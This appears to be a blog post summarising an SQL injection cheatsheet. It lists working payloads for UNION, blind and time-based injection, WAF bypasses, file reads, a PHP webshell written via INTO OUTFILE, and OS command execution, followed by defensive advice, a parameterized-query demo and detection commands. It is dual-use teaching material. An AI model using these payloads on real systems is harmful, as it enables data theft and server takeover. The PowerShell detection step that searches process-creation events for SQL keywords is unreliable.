SQL injection (SQLi) remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate database queries. Tib3rius provides a comprehensive SQLi cheatsheet that covers various techniques for identifying and exploiting SQL injection vulnerabilities.
🔗 Cheatsheet URL: https://tib3rius.com/sqli
You Should Know:
### **1. Basic SQL Injection Payloads**
- Classic UNION-based SQLi:
```sql
' UNION SELECT 1,2,3-- -
' UNION SELECT username,password,NULL FROM users-- -
```
- Boolean-based blind SQLi:
```sql
' OR 1=1-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
```
- Time-based blind SQLi:
```sql
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -   -- MSSQL
' OR (SELECT SLEEP(5))-- -              -- MySQL
```
### **2. Bypassing WAFs (Web Application Firewalls)**
- Obfuscation techniques:
```sql
/*!50000SELECT*/ * FROM users          -- MySQL version-specific comment
'/**/UNION/**/SELECT/**/1,2,3-- -      -- inline comments in place of spaces
```
- Hex encoding:
```sql
0x2720756e696f6e2073656c65637420312c322c332d2d202d   -- decodes to: ' union select 1,2,3-- -
```
### **3. Database-Specific Commands**
#### **MySQL / MariaDB**
```sql
SELECT @@version;
SELECT user();
SELECT database();
```
#### **PostgreSQL**
```sql
SELECT version();
SELECT current_user;
SELECT current_database();
```
#### **Microsoft SQL Server**
```sql
SELECT @@version;
SELECT SYSTEM_USER;
SELECT DB_NAME();
```
#### **Oracle**
```sql
SELECT banner FROM v$version;
SELECT user FROM dual;
```
### **4. File Operations (If Privileges Allow)**
- Reading files:
```sql
SELECT LOAD_FILE('/etc/passwd'); -- MySQL
```
- Writing files (webshell upload):
```sql
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- MySQL
```
### **5. OS Command Execution (If Possible)**
- MySQL (using sys_exec):
```sql
SELECT sys_exec('id');
```
- PostgreSQL:
```sql
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
```
## **What Undercode Say**
SQL injection remains a severe threat due to improper input sanitization. Always use:
- Prepared statements (parameterized queries)
- Stored procedures
- ORM (Object-Relational Mapping) frameworks
- Input validation and output encoding
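To show why the first recommendation matters, here is an added example (not part of the cheatsheet or the original post): a user lookup built by string concatenation beside the same lookup as a parameterized query, both run against a constructed in-memory SQLite table with the cheatsheet's `' OR 1=1-- -` payload. The table, its rows and the function names are assumptions made for this demonstration.

```python
import sqlite3

# Constructed sample database for the demonstration (not from the cheatsheet).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # String concatenation: the attacker's quote closes the literal, OR 1=1 makes
    # the WHERE clause always true, and "-- -" comments out the trailing quote.
    query = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    # Prepared statement: the value travels separately from the SQL text, so the
    # quote and comment markers are just characters inside a string and match nothing.
    query = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()

PAYLOAD = "' OR 1=1-- -"   # boolean-based payload quoted in the cheatsheet

def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),        # every row leaks
        "parameterized": lookup_parameterized(conn, PAYLOAD),  # no rows
        "legit": lookup_parameterized(conn, "alice"),          # normal use still works
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```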
### **Defensive Commands & Tools**
- Detect SQLi with sqlmap:
```bash
sqlmap -u "http://example.com/page?id=1" --risk=3 --level=5
```
- Log analysis (Linux):
```bash
grep -i "union.*select" /var/log/apache2/access.log
```
- Block SQLi via ModSecurity (WAF):
```apache
SecRule ARGS "@detectSQLi" "deny,log,id:1000"
```
- Windows Security log (PowerShell; find SQLi patterns in process-creation events):
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Message -match "union.*select"}
```
Expected Output: A secure web application that filters malicious SQL queries and logs attempted attacks for further analysis.
🔗 Reference: https://tib3rius.com/sqli
Reported by: Tib3rius (Hackers Feeds)